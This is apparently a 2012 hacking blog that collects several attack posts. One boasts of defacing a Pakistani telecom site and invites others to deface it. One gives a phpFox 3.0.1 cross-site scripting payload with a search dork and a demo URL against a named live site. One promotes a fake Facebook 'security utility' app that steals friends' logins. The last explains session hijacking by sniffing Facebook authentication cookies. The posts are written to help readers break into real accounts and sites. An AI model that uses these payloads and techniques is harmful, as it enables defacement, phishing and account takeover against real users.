Wednesday 19 September 2012

ptcl.com.pk hacked by Crash Override now


The famous website of pakistan ptcl.com.pk was hacked by Crash Override noobs can try entering the website and deface it



the admin logins are given below

Sunday 9 September 2012

PhpFox 3.0.1 Cross Site Scripting



Google Dork: Intext:"Powered By phpFox Version 3.0.1"

Vendor Home : http://www.phpfox.com/


 There are lots of parametrs Vulnerable to xss in ajax.php file like feed_id & message & title & ...
 
D3m0:

http://buddymahal.com//static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message="><script>alert(document.cookie);</script>&width=300

Get Access to Your Friends Email and Password Using The Dirty Facebook Application Trick


As you are already aware of my Facebook hacking application known as "New FB security utility" which convinces the users to save their accounts from hackers but in fact the are hacked.

This is a new , advanced and most reliable way of hacking facebook accounts. You cannot find such kind of  application on the whole "WEB" . In other words you can say that I am the creator of this application :D . Now its your turn to make an application like this one. So let's get started.

Hack a Gmail account using GX cookies

Hack a Facebook account with cookie stealing or session hijacking

Description:

In this article i am describing a way of hacking a Facebook account with wireshark (stealing your victim's cookies) also known as session hijacking

The cookie which facebook uses to authenticate it's users is called "Datr", If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account. This is how a facebook authentication cookie looks like:


Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc; 


How To Steal Facebook Session Cookies And Hijack An Account?

An attacker can use variety of methods in order to steal your facebook authentication cookies depending upon the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet sniffer and gain access to victims account.